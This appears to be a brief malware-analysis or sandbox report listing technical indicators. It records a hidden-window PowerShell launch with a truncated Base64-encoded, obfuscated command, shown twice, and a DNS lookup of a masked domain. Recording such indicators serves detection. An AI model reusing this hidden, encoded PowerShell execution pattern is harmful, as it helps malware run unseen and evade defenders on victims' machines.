Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAKAB2AGEAUgBpAEEAYgBsAEUAIAAnACoAbQBEAHIAKgAnACkALgBOAGEAbQBlAFsAMwAsADEAMQAsADIAXQAtAGoATwBpAE4AJwAnACkAIAAoACgAKAAoACIAewA0ADEAfQB7ADcAMwB9AHsANQAyAH0AewA2ADUAfQ...
- DNS ASK fq###w4d4.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAKAB2AGEAUgBpAEEAYgBsAEUAIAAnACoAbQBEAHIAKgAnACkALgBOAGEAbQBlAFsAMwAsADEAMQAsADIAXQAtAGoATwBpAE4AJwAnACkAIAAoACgAKAAoACIAewA0ADEAfQB7ADcAMwB9AHsANQAyAH0AewA2ADUAfQ...' (with hidden window)